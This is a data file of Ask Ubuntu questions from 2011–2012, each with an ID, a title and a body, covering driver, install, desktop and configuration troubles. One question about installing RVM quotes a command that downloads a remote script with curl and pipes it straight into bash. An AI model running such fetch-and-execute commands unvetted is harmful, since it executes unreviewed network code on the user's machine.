100559	apt-get installation , path directory and running dependency programs	i am very new to ubuntu and please bear with me if i present a very layman 's version of explanation . my os : ubuntu 11.10 server , 64bit version i need to use three tools samtools , bowtie and tophat . however tophat is dependent upon samtools and bowtie . the dependency factor is - to ascertain where exactly the path to the above two tools ( samtools and bowtie ) are located . now , i can install samtools and bowtie using sudo apt-get install however i dont know exactly where the library paths exists for samtools or bowtie according to the tophat installation notes , i am to extract the tool from compressed file , change dir into this file and ./configure ; but i dont see the ./configure script in the extracted directory samtools and bowtie and tophat are found on their sites , this is the installation method i am trying to follow .
100564	why are some programs not getting focused correctly ?	why sometimes when i open a picture or skype ( probably there are other programs with the same behavior , but i do n't remember now ) the image viewer / skype is not focused . it does n't happen all the time . i can not catch the exact condition when this happens , but it really bothers me because often i close the wrong program .
100566	what is the text box on the desktop for ?	if i click on the desktop/background picture in ubuntu 11.10 ( unity ) and start typing text , a little text input box appears containing my written text . if hit return the box goes away along with the text . what is this for ? i am just curious . is this a lovely feature i am not enjoying the functionality of due to my ignorance ?
100568	switching drives in terminal	in dos , i switch between different drives by typing c : , d : , e : etc. , but it does n't work that way in linux . could anyone please tell me how to switch between different drives ?
100570	wireless is disabled by hardware switch on sony vaio	i have sony vaio vpceb26fg . i installed ubuntu 11.04 . when i switch on my wireless button only bluetooth gets activated and it shows wireless is disabled by hardware switch . i tried using command $ sudo rfkill list . the output of which is kiran @ sytem : ~ $ rfkill list 0 : sony-wifi : wireless lan soft blocked : no hard blocked : no 1 : sony-bluetooth : bluetooth soft blocked : no hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : no 3 : hci0 : bluetooth soft blocked : no hard blocked : no how to solve this problem ? ?
100572	formatting of `` release notes '' window	i was trying to upgrade from 11.04 to 11.10 following this guide . if you take a look at the image from step 3 : the content inside the release notes window is formatted correctly . now , this is my release notes window after i click the upgrade button : as you can see , the content is not being formatted at all . how can i solve this ?
100575	installing rvm on 11.10	i have been trying to get rvm properly installed on my system for 10 hours . the problem is , that when ever i run the command to download the install script i get this : edu @ edu-virtualbox : ~ $ bash -s stable < < ( curl -s https : //raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer ) mkdir : can not create directory `/usr/share/ruby-rvm ' : permission denied if i run the command with sudo , i can get it installed , but then that leads to a whole host of other issues . every tutorial i read says that you should not be installing rvm with sudo for a single user install . why can i seem to get it installed without running sudo ?
100580	need help installing 11.10 on an asus eee 1015px	background - i had 11.10 running on the netbook no issues for 2 months , then after update yesterday the entire os was a mess and unusable , so i attempted a clean install . i made a boot usb of 11.10 as recommended since my original was destroyed , but whenever i try to install i get errno 5 . i 've re-done my usb it 8 or 10 times now , ultimate boot said the hard drive is fine and i can run 11.10 perfectly from the usb itself . then when i proceed to install when running i get errno 5 again . the drive was reformatted last night as my dads last ditch attempt of recovering anything and i only have one usb stick , so running 11.10 on usb is n't really viable , and neither is running a netbook without the net . both are equally desirable outcomes to this 11.10 working and stable 10.10 recognising i have a wireless card remade usb , still not working . can not use cd as notebook has no cd drive . usb is 32 bit as is the os i used to make it on , in case that matters . processor and specifications are as stated in the links . the final link was n't really any use , i already have 11.10 but it will not install even after formatting my key so much its incredibly clean in there . i also have 2gb of ram in my notebook which was upgraded before my first install of 11.10 . any suggestions ?
100582	midi to vmpk to qsynth to audio ?	i 'm currently using jack ( qjackctl ) + vmpk + qsynth to try to simply jam a little bit on my keyboard on my linux machine . i can see all of the inputs and outputs , but i 'm still not getting any sound . here 's my jack connection map : here 's vmpk , showing that i 'm able to play notes with my usb midi device : finally , here 's qsynth : if i wire my usb device directly to qsynth , i see activity in the bottom left , but if i wire it to vmpk then to qsynth , i do n't see activity . in either case , i do n't get sound . i do n't know how i should have this thing wired . it seems like i should wire my keystation usb device to vmpk , then wire vmpk output to the synth . however , i do n't hear any audio at all , and i 've quite a few things . what am i doing wrong here ?
100583	how to run.vhd file ( virtual pc image ) in ubuntu 11.10	how to run a .vhd file ( virtualpc image ) in ubuntu 11.10 and which software can be used to run it ?
100586	how do i access a wubi install after installing a third os alongside windows ?	i have never got my head around the boot loaders and stuff . i have three partitions c : , d : and e. i installed ubuntu inside windows ( wubi ) on the second drive d : . yesterday i made an another partition g : and installed fedora16 onto it . during the installation i installed the boot loader in mbr from /dev/sda . now the default boot loader is grub . but grub does n't show ubuntu in the menu.i have all my scripts in my ubuntu home folder which is now inaccessible . how do i add the ubuntu entry into grub ? ? do i revert to the windows boot loader and add the ubuntu entry using the easybcd program ? ? btw windows is the primary os and is installed in the c drive i am a student and relatively new to linux .
100590	ca n't visualize web service of wireless cameras using chromium	when i write the ip address of my camera using chromium i ca n't visualize them , it 's because the cameras need activex activated on ie . how can i see activex content in ubuntu ?
100591	unity3d loads all the time instead of selected desktop session	every time i log out , and change session , select unity2d and login ubuntu is loaded , to what it seems to be in unity3d . when i check in the terminal , that is confirmed . i even changed the default to unity2d , via one of the config files , but still , no joy . it always is just unity3d - even when i select gnome shell ( i downloaded gnome shell from the software manager ) . any ideas on why unity3d is loading instead of other desktop sessions ?
100595	how to uninstall puddletag - audio tag editor ?	today i was install puddletag ( audio tag editor ) via deb pack . i tested it , but now i would like to uninstall it .
100597	how can i force firefox to open a aspx file ?	http : //www.morningstar.es/default.aspx asks for a file operation ( open with xxx app or safe ) , http : //clerk.house.gov/floorsummary/floor.aspx , however opens without a hitch ( as in this thread ) . any suggestions ? i do n't have silverlight installed .
100598	installed kde4.8 on ubuntu and it messed up browser 's fonts	i installed kde 4.8 on my 11.10 system just to try it out but did n't like it and eventually un-istalled it . but now the browser 's font ( both firefox & chromium ) are messed up badly . how can i restore them back to defaults ?
100599	is there a caldav client with email alert support on ubuntu server ?	assume i had an ubuntu server with a caldav server ( in my case this is owncloud 3 ) , but the server did n't allow sending of calendar events by email to me . i 'm looking to install a caldav client , on the same server ( must be command line driven ) , which i can subscribe to the caldav server ( on the same server ) , which will send out email alerts to me on events i put in there . any client as such available ?
100600	can not connect to secure wireless with netgear wna3100 usb	i have installed ubuntu 11.10 . i used a wired connection to download and install all of the updates . when i tried to use a netgear wna3100 wireless usb network adapter , it failed . much searching and trying things i was finally able to get it working by disabling security on my router . i have verified this by disabling security and i was able to connect . when i enabled security ( wpa2 psk ) , the connection failed . what is necessary to enable security ( wpa2 psk ) and still use the netgear usb interface ? here is the output from the commands most requested lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 003 : id 0846:9020 netgear , inc. wna3100 ( v1 ) wireless-n 300 [ broadcom bcm43231 ] lshw -c network *-network description : ethernet interface product : rtl-8139/8139c/8139c+ vendor : realtek semiconductor co. , ltd. physical id : 3 bus info : pci @ 0000:02:03.0 logical name : eth0 version : 10 serial : 00:40 : ca:44 : e6:3e size : 10mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=8139too driverversion=0.9.28 duplex=half latency=32 link=no maxlatency=64 mingnt=32 multicast=yes port=mii speed=10mbit/s resources : irq:19 ioport : c800 ( size=256 ) memory : ee011000-ee0110ff memory:40000000-4000ffff *-network description : wireless interface physical id : 1 logical name : wlan0 serial : e0:91 : f5:56 : e1:0d capabilities : ethernet physical wireless configuration : broadcast=yes driver=ndiswrapper+bcmn43xx32 driverversion=1.56+,08/26/2009 , 5.10.79.30 ip=192.168.1.104 link=yes multicast=yes wireless=ieee 802.11g iwconfig lo no wireless extensions . eth0 no wireless extensions . wlan0 ieee 802.11g essid : '' vincecarolradice '' mode : managed frequency:2.422 ghz access point : a0:21 : b7:9f : e5 : ee bit rate=121.5 mb/s tx-power:32 dbm rts thr:2347 b fragment thr:2346 b encryption key : off power management : off link quality:76/100 signal level : -47 dbm noise level : -96 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 ndiswrapper -l bcmn43xx32 : driver installed device ( 0846:9020 ) present lsmod | grep ndis ndiswrapper 193669 0 dmesg | grep -e ndis -e wlan [ 907.466392 ] ndiswrapper version 1.56 loaded ( smp=yes , preempt=no ) [ 907.838507 ] ndiswrapper ( import:233 ) : unknown symbol : ntoskrnl.exe : 'iounregisterplugplaynotification' [ 907.838955 ] ndiswrapper : driver bcmwlhigh5 ( netgear,11/05/2009 , 5.60.180.11 ) loaded [ 908.137940 ] wlan0 : ethernet device e0:91 : f5:56 : e1:0d using ndis driver : bcmwlhigh5 , version : 0x53cb40b , ndis version : 0x501 , vendor : 'ndis network adapter ' , 0846:9020.f.conf [ 908.141879 ] wlan0 : encryption modes supported : wep ; tkip with wpa , wpa2 , wpa2psk ; aes/ccmp with wpa , wpa2 , wpa2psk [ 908.143048 ] usbcore : registered new interface driver ndiswrapper [ 908.178826 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 994.015088 ] usbcore : deregistering interface driver ndiswrapper [ 994.028892 ] ndiswrapper : device wlan0 removed [ 994.080558 ] ndiswrapper version 1.56 loaded ( smp=yes , preempt=no ) [ 994.374929 ] ndiswrapper : driver bcmn43xx32 ( ,08/26/2009 , 5.10.79.30 ) loaded [ 994.404366 ] ndiswrapper ( mp_init:219 ) : could n't initialize device : c0000001 [ 994.404384 ] ndiswrapper ( pnp_start_device:435 ) : windows driver could n't initialize the device ( c0000001 ) [ 994.404666 ] ndiswrapper ( mp_halt:262 ) : device e05b6480 is not initialized - not halting [ 994.404671 ] ndiswrapper : device eth % d removed [ 994.404709 ] ndiswrapper : probe of 1-5:1.0 failed with error -22 [ 994.406318 ] usbcore : registered new interface driver ndiswrapper [ 2302.058692 ] wlan0 : ethernet device e0:91 : f5:56 : e1:0d using ndis driver : bcmn43xx32 , version : 0x50a4f1e , ndis version : 0x501 , vendor : 'ndis network adapter ' , 0846:9020.f.conf [ 2302.060882 ] wlan0 : encryption modes supported : wep ; tkip with wpa , wpa2 , wpa2psk ; aes/ccmp with wpa , wpa2 , wpa2psk [ 2302.113838 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 2354.611318 ] ndiswrapper ( iw_set_auth:1602 ) : invalid cmd 12 [ 2355.268902 ] addrconf ( netdev_change ) : wlan0 : link becomes ready [ 2365.400023 ] wlan0 : no ipv6 routers present [ 2779.226096 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 2779.422343 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 2797.574474 ] ndiswrapper ( iw_set_auth:1602 ) : invalid cmd 12 [ 2802.607937 ] ndiswrapper ( iw_set_auth:1602 ) : invalid cmd 12 [ 2803.261315 ] addrconf ( netdev_change ) : wlan0 : link becomes ready [ 2813.952028 ] wlan0 : no ipv6 routers present [ 3135.738431 ] ndiswrapper ( iw_set_auth:1602 ) : invalid cmd 12 [ 3139.180963 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 3139.816561 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 3163.229872 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 3163.444542 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 3163.758297 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 3163.860684 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 3205.118732 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 3205.139553 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 3205.300542 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 3353.341402 ] ndiswrapper ( iw_set_auth:1602 ) : invalid cmd 12 [ 3363.266399 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 3363.505475 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 3363.506619 ] ndiswrapper ( set_iw_auth_mode:601 ) : setting auth mode to 5 failed ( 00010003 ) [ 3363.717203 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 3363.779206 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 3405.206152 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 3405.248624 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 3405.577664 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 3438.852457 ] ndiswrapper ( iw_set_auth:1602 ) : invalid cmd 12 [ 3438.908573 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 3568.282995 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 3568.325237 ] ndiswrapper ( set_iw_auth_mode:601 ) : setting auth mode to 5 failed ( 00010003 ) [ 3568.460716 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 3568.461763 ] ndiswrapper ( set_iw_auth_mode:601 ) : setting auth mode to 5 failed ( 00010003 ) [ 3568.809776 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 3568.880641 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 3610.122848 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 3610.148328 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 3610.324502 ] addrconf ( netdev_up ) : wlan0 : link is not ready [ 3636.088798 ] ndiswrapper ( iw_set_auth:1602 ) : invalid cmd 12 [ 3636.712186 ] addrconf ( netdev_change ) : wlan0 : link becomes ready [ 3647.600040 ] wlan0 : no ipv6 routers present i am using the system now with the router security turned off . when i submit this , i will turn security back on .
100603	in the gnome shell extension icon manager , how do i move the `` removable devices '' from the tray to the top panel ?	in other words , what icon name do i have to put in dconf-editor/org/gnome/shell/extensions/icon-manager - > top-bar to get rid of the removable devices ( and ubuntu one ) from sys tray ?
100604	set desktop resolution for standard 11.10 vnc server	is it possible to specify a desktop resolution for the built-in ubuntu 11.10 vnc server ? it defaults to 640x480 when i have no monitor connected ( headless ) , and i ca n't find a way to change it . does it have any command line parameters ? a similar issue has been posted : set screen resolution when booting with no screen note : the box is set to auto-login , so if i can change the auto-login resolution ( with no monitor ) , that could possibly help .
100607	syncing my ipod touch ( and others )	libimobiledevice does n't work for me . i 've got ubuntu 11.10 and i 'm trying to put music on to my ipod touch 4gen running ios 5.0.1 . i have tried every program available in the ubuntu software center for sycing ipods and i get basically the same response from each one : `` [ can not apply changes etc , ect , etc ] '' i 've tried rigorously with banshee and rythmbox with no success . i 've even tried running itunes on windows xp in virtualbox with no success . i 've tried running itunes through wine and it results in an error message saying something along the lines of `` [ please install apple application support and then reinstall itunes ] '' . i am considering jailbreaking my ipod but i can not find absinthe that works with my ipod and with ubuntu . in addition i 'm not sure how ** works with ubuntu . i 'm really in a pickle here . it would be ever so helpful if i could indeed have some help with this issue .
100612	error installing git with apt-get	when i attempt to install git on a server distribution of ubuntu 11.04 , i get an error . i used the following command : sudo apt-get install git and that generated this error : ( reading database ... dpkg : warning : files list file for package `git ' missing , assuming package has no files currently installed . ( reading database ... 20310 files and directories currently installed . ) preparing to replace git 1:1.7.4.1-3 ( using ... /git_1 % 3a1.7.4.1-3_i386.deb ) ... /var/lib/dpkg/tmp.ci/preinst : 12 : dpkg-maintscript-helper : not found dpkg : error processing /var/cache/apt/archives/git_1 % 3a1.7.4.1-3_i386.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 127 /var/lib/dpkg/tmp.ci/postrm : 14 : dpkg-maintscript-helper : not found dpkg : error while cleaning up : subprocess new post-removal script returned error exit status 127 errors were encountered while processing : /var/cache/apt/archives/git_1 % 3a1.7.4.1-3_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i 'm using the following repositories : # deb cdrom : [ ubuntu 8.04.3 _hardy heron_ - release i386 ( 20090713.1 ) ] / hardy main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //us.archive.ubuntu.com/ubuntu/ natty main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ natty main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //us.archive.ubuntu.com/ubuntu/ natty-updates main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ natty-updates main restricted # # main & restricted repositories # deb http : //us.archive.ubuntu.com/ubuntu/ lucid main restricted # deb-src http : //us.archive.ubuntu.com/ubuntu/ lucid main restricted # deb http : //security.ubuntu.com/ubuntu lucid-security main restricted # deb-src http : //security.ubuntu.com/ubuntu lucid-security main restricted # # universe repositories # deb http : //us.archive.ubuntu.com/ubuntu/ lucid universe # deb-src http : //us.archive.ubuntu.com/ubuntu/ lucid universe # deb http : //us.archive.ubuntu.com/ubuntu/ lucid-updates universe restricted main # deb-src http : //us.archive.ubuntu.com/ubuntu/ lucid-updates universe # deb http : //security.ubuntu.com/ubuntu lucid-security universe # deb-src http : //security.ubuntu.com/ubuntu lucid-security universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # universe will not receive any review or updates from the ubuntu security # # team . deb http : //us.archive.ubuntu.com/ubuntu/ natty universe deb-src http : //us.archive.ubuntu.com/ubuntu/ natty universe deb http : //us.archive.ubuntu.com/ubuntu/ natty-updates universe deb-src http : //us.archive.ubuntu.com/ubuntu/ natty-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //us.archive.ubuntu.com/ubuntu/ natty multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ natty multiverse deb http : //us.archive.ubuntu.com/ubuntu/ natty-updates multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ natty-updates multiverse anyone have any idea what 's going on or how i can fix this and get git to install ? [ edit ] here 's the output of apt-cache policy dpkg : dpkg : installed : 1.15.5.6ubuntu4 candidate : 1.16.0~ubuntu7.1 version table : 1.16.0~ubuntu7.1 0 500 http : //us.archive.ubuntu.com/ubuntu/ natty-updates/main packages 1.16.0~ubuntu7 0 500 http : //us.archive.ubuntu.com/ubuntu/ natty/main packages *** 1.15.5.6ubuntu4 0 100 /var/lib/dpkg/status and now apt is completely broken . i attempted to update dpkg , because i noticed that it was a couple versions out of date . it failed because it could n't install git . i attempted apt-get purge , apt-get clean and apt-get update . still the same problem . i attempted to remove git and got this : removing git-core ... dpkg : error processing git ( -- remove ) : package is in a very bad inconsistent state - you should reinstall it before attempting a removal . errors were encountered while processing : git e : sub-process /usr/bin/dpkg returned an error code ( 1 )
100614	how to use wi-fi atheros card to share the internet with windows 7 box ?	the problem is : when my friend creates a shared wi-fi connection in his windows 7 box , my ubuntu box sees that . it has two icons : wi-fi signal ( as it is wi-fi ) and a wired connection ( so i do n't understand why ) . but when i try to click on the name of the network in the list , nothing happens . the list just closes , that 's all . and when i create new wireless network in my ubuntu box ( now i plug the internet cabel in and i need to share the internet with my friend ) , my friend ca n't connect via his windows 7 box . he says that password does n't match , however the password is correct . i think , maybe it 's something wrong with password-secured connection ? but i ca n't create unsecured network . well , looking forward for hearing from you , guys . thanks !
100616	can not view mounts remotely	i have several samba mounts on an ubuntu server . when i ssh into that box remotely ( instead of working directly on the box ) , i can not see the mounted file systems ( ie , if i ls there are no results ) . is this normal , have my mounts failed to load in my absense , or is something else at play ?
100618	dell and jupiter are they compatible ?	i have installed jupiter on my dell inspiron 1520 with ubuntu 10.04 but i am not able to choose the mode , i do n't have the line `` performance mode '' . how can that be ? thank you !
100620	how to keep ubuntu one from deleting items when there is a conflict	question : every now and then when i get a conflict on ubuntu one it deletes the file and leaves just the .u1conflict file . info : last night i spent 5 hours working on a python program i called facere.py , i made a folder for it of the same name , facere . this was happening on my desktop . now earlier in the day i knew i wanted to do this so i had made the folders on my netbook , but promptly got distracted so they did n't have a chance to sync . so i recreated them on my desktop and did n't open my netbook to let the sync just happen . 5 hours go by . i have done a fair chunk of work on facere.py and made a couple dev docs in facere/ , its now mid night so i got to bed . i get to class and open my netbook and i see facere.u1conflict/ . wide eyed i look in it and see only facere.py ( who has one line `` from tkinter import * '' ) . i proceed to check my phone , facere/ does n't exist , i check my desktop , folder is gone there too , i check one.ubuntu.com as a last hope . nothing . the work i did last night was mostly educational and i could probably recreate it better than it was in about half an hour . what i 'm really concerned with is that this is n't the first time something like this has happened . what is happening that ubuntu one is deleting my files every now and then ? it is really disconcerting and kind of makes ubuntu one less enticing to people when i brag to windows users about how i never worry about loosing my data because it is in the cloud . any insight ?
100628	prevent wireless from turning off when lid goes down	i frequently leave my laptop idle and close the lid when i do so . problem is that the wireless turns off if i do so and my downloads ca n't happen . is there anyway to prevent that from happening ? i am using 10.04 . p.s . i have already disabled suspend from happening on default
100631	alt-tab forces me to reboot	i 'm using ubuntu 11.10 according to my help . when i press alt-tab , the display flashes a bit and then all my windows have no title bar . without a title bar at the top , i ca n't even restart . all i can do is turn off the power . i had a terminal window open during one of these alt-tab presses , and i 'm unable to type in the terminal window . this was working until today when i was asked to install some upgrade . please do n't advise me to not press alt-tab . i 'm have difficulty not pressing alt-tab due to habit and i 'm not getting my work done when i have to powerdown a couple of times every hour . this case happens in situation where u hold the alt key for a while ( say 2 to 3 secs ) and press the tab button , then monitor flashes implies unity breakdowns and move all the applications to single workspace , if you repeat it second time , you will end up with un accessible desktop where all applications hang . then you have only one option restart unity ( ctrl + alt + f1 ) login enter unity command and enter ( ctrl + alt f7 ) u will get back your desktop but you have to arrange all the applications in the respective workspaces , which makes my day very very bad , i have switched back to linux mint which is at least stable sorry for editing it , i din , t find how to answer your post
100636	( 1gb ram ) very slow and freezes often on 11.10	my netbook ist very slow with 11.10 . windows often freeze . i have a samsung n150 with 1gb ram and 1.5gb swap . ram appears to be constantly filled . all i have opened is the browser . here is what i get after free -m : total used free shared buffers cached mem : 988 887 101 0 16 343 -/+ buffers/cache : 526 461 swap : 1429 238 1191 please help . this is very annoying .
100640	command who question	why when i type the command who does it show my_username tty7 my_username pts/0 should n't it just show one ? why am i logged in twice ? and what is the difference between tty7 and pts/0 ?
100648	delete grub ubuntu 11.10	how do i delete grub on ubuntu 11.10 . i want to get into ubuntu normally without having to choose which operating system i would run . and how to remove ubuntu with older kernels as shown below grub
100653	how can i get the launcher to recognize another icon of an application already on the launcher ?	how do i add another icon in the launcher for an application that is already present . a second chromium icon specifically , and then name them differently ?
100654	why is adb not working on ubuntu 11.10 ?	i 'm on ubuntu 11.10 64bit and adb is excutable but when i use the commands in the terminal i get this : adb : error while loading shared libraries : libncurses.so.5 : wrong elf class : elfclass64 how do i get adb to work ?
100657	download does n't work in firefox recently	my current firefox version is 9.0.1 . i am under ubuntu 10.10 . i am not sure if some recent updates has changed firefox , but its appearance has changed : its tab bar has been moved above address bar , and the original fresh and stop buttons beside the backward/forward buttons have been combined and moved into one single small button within the address bar . the worst thing is that right click and then `` save link as '' , for example for downloading pdf and other documents , will become unresponsive a short while after starting the firefox . added : my problem is with right-click download , and sometimes even those pop out download ( i mean paste a link to a pdf file in address bar and hit return ) . in these cases , i can choose where to save files to , but after that nothing is downloaded . restarting firefox may solve the problem , but that is certainly not the solution . i was wondering why and how to fix the download problem ? and possibly change back to original appearance of the firefox ? thanks and regards !
100661	adding ubuntu to active directory with likewise open	i have a problem adding my ubuntu server to ad . i followed this great tutorial but it fails on join command : sudo domainjoin-cli join mydomain.com administrator . it gives me this error : error : dns_error_bad_packet [ code 0x0000251e ] a bad packet was received from a dns server . potentially the requested address does not exist . a can ping mydomain.com from server just fine . how can i solve this ?
100662	how can i analyze this debian package before installing it ?	i 'm looking at the debian package here : http : //repo2.maven.org/maven2/org/mortbay/jetty/dist/jetty-deb/8.1.0.v20120127/ before installing it , i 'm curious how much information i can get just by analyzing the debian package . i would love to know exactly what is going to be installed and where . is this possible ?
100672	how to prevent `` automatic '' bold version of a font to be wider than regular having the same pt size ?	i have a monospaced font ( pt mono ) that i prefer to use in programming ide 's . the font has only regular , all other bold and italic are derived by slanting and `` boldification '' of the regular . the problem is that the `` boldified '' characters are wider than regular ones , so the source code strings in the ide window are now composed of non-monospaced characters . how do i control the `` boldification '' of the font so it would not become wider than regular ? the problem is illustrated on the screenshot below ( pt mono , no dedicated bold ) . see how `` unsigned char '' and `` sizeof '' words are moving out from their proper positions . here an another example , droid sans mono ( no dedicated bold ) . and here an example when the font has dedicated bold version ( liberation mono ) . bold and regular are aligned perfectly . so , the issue is definitely in frivolous boldification rendering in situations where bold is not provided . the font engine is to blame . upd : there is a file /etc/fonts/conf.avail/90-synthetic.conf which if being referenced from /etc/fonts/conf.d/ tunes the font engine to perform synthetic emboldening of the fonts that do not have the bold version . if the symbolic link to this file is removed from the /etc/fonts/conf.d/ , the emboldening disappears . this is not what is exactly wanted , but at least this cures the case of monospace fonts being not monospace ( see below , pt mono ) . the fine tuning of the emboldening is still wanted ( either by configuration file , or by freetype2 patch .
100673	attempting to install postfix on an amazon ec2 instance and getting 404 not found	basically i am trying to install postfix and getting 404 errors . hopefully this screenshot will explain more :
100674	can not resize launcher icons in unity	i am using oneiric . i have unity 4.28 installed . i have also installed ccsm , ubuntu tweak , dconf tools and myunity . i have tried resizing the launcher icons using these tools , but none of them are having the desired effect . it would help if any one could provide suggestions on how to resolve this issue .
100676	changing ips in /etc/hosts file	i am a beginner and i have the following doubt : currently i 'm connecting to the internet via dhcp address assignment . i 'm following apache hadoop setup tutuorial from here where they 've asked me to assign ips 192.168.0.x to the master and slave . what is the significance of the address ? how is it updating in the hosts file diff from updating network interfaces file ? master and slaves already have ips of the form a.b.c.d and a.b.e.f .
100677	no password set but still asks for a password	i decided to turn off the password . a couple days after this i tried downloading a webcam app and it asks me for my password . i tried my old passwords but it gets denied . online i found an explanation on how to restore my password . i go through all the steps and it asks for me to enter new unix password , so i enter in a new password there . it prompts me to enter it again so i do and then it says authentication manipulation error , then in the line below it , it says password unchanged . is there a way to fix this or will i have to reinstall ubuntu ?
100682	how to set exceptions for proxy in ubuntu 11.10 ?	i am using internet through proxy server of our organization . but i do n't want to use the proxy server when opening my local websites published in my own web server in localhost . how can i set exceptions for proxy in ubuntu 11.10 ? thank you !
100683	special characters in password	i am looking for a list of the valid characters which can be used in a user account password on ubuntu . man passwd just tells me : as a general guideline , passwords should consist of 6 to 8 characters including one or more characters from each of the following sets : 路 lower case alphabetics 路 digits 0 thru 9 路 punctuation marks which is not helping much .
100684	unwanted chinese language got set in system settings	i have made some changes in system settings , following suggestions by some users . however , this morning when i did a reboot i am unable to see english as my default language . my system is showing some chinese characters which i do not understand . all i wanted was to use libre office for a particular document in hindi . what happened is that even gmail is opening in chinese . the system settings folder and others are also opening in chinese . i am unable to use the system now . i have uploaded the snapshots here : please have a look . upon a reboot , i was asked to rename all folders . gmail opening in chinese this is how menu on my system looks : half english and half chinese notice that in the third snapshot the calendar and menu are appearing in chinese . i want the original us english menus and folder names back . i just wanted to type a document with lohit hindi font in libre office . i use ubuntu 11.10 . i do not use unity , only gnome desktop . i installed gnome-session-fallback a long time back and have been using that ever since . how do i get back to all english submenus and english folder names ? i have a us english keyboard and i use only us english . this thing which is now somehow set is unwanted .
100689	about ubuntu login system:	does anyone know if ubuntu can configure to login system in my workstation.i mean if someone login with their account they can only use specific application then automatically closed or return to login screen if times run out .
100693	how can i manually change the default web browser ?	firefox is not showing in system-settings - system info . so i can not use the menu to choose it . ( i do n't want to seem off-topic but i think a little background would be helpful here : the previous ubuntu version of firefox was crashing my system all the time so i uninstalled it . i then manually installed the mozilla version of firefox 10 which is running well . but if i click on the check now button in firefox 's advanced preferences then nothing happens , and the dialog that should appear asking me if i 'd like to make it the default browser does not show up . ) is there a config file or something i can edit to make ubuntu aware that firefox exists on my system , and allow me to set it as my default browser ? i 'm using ubuntu 11.10
100697	how do i report a bug related to the keyboard ?	i am a novice ubuntu user . i posted the below problem , but my question was closed and the moderator noted that it should have been reported as a bug . i followed the instructions for reporting the bug , but i do n't know what package has the problem , so i needed to do a general bug reporting using ubuntu-bug in the `` run application '' window . unfortunately , the only kinds of problems i can report are `` security related '' , `` sound/audio '' , `` display '' , `` external or internal storage '' , and `` other '' . none seemed to fit my problem , so i chose `` other '' - but then got an error message that says `` you need to specify a package or a pid . '' can someone please help me out here - and give me a clue as to what i did wrong ? thanks . question i originally posted : this is a slightly difficult problem to explain and it does n't seem like a hardware issue ( though of course i am not sure ) . i have an asus eee pc netbook running ubuntu 10.10 . the tilde key does not work ( not using shift and not as the single quote when not using shift ) . while that is slightly annoying , it is n't such a big deal . what is a huge problem is that randomly out of nowhere , i 'll see a bunch of single quotes being typed on the screen . it sometimes happens when i am in a document , in an email , in a browser , or even typing in my password . it 's almost like there is some strange virus on my laptop that holds down that button at random points in time . if i start clicking the backspace button , it sometimes deletes them , but sometimes it feels like the key is fighting back and just keeps typing the single quotes . sometimes ( e.g , if i am in the box where i need to enter my password ) , i can easily just hit ctrl-a and then delete , but sometime the problem persists and i have trouble logging in . any thoughts on this ? thanks so much .
100698	restrict access from another user to the ntfs partition	it is possible somehow restrict access to a partition to a specific user in ubuntu ? i am using ubuntu x64 11.10 , i made 2 accounts , both accounts belong to the administrators group . and i have 3 partitions , on first is os formatted in ext4 , the second one is swap , and the third one is partition designed for data storage , formatted in ntfs , now i want to restrict access to the third one for second user , or hide it . and by the way , the ntfs partition is set to mount automatically at start up .
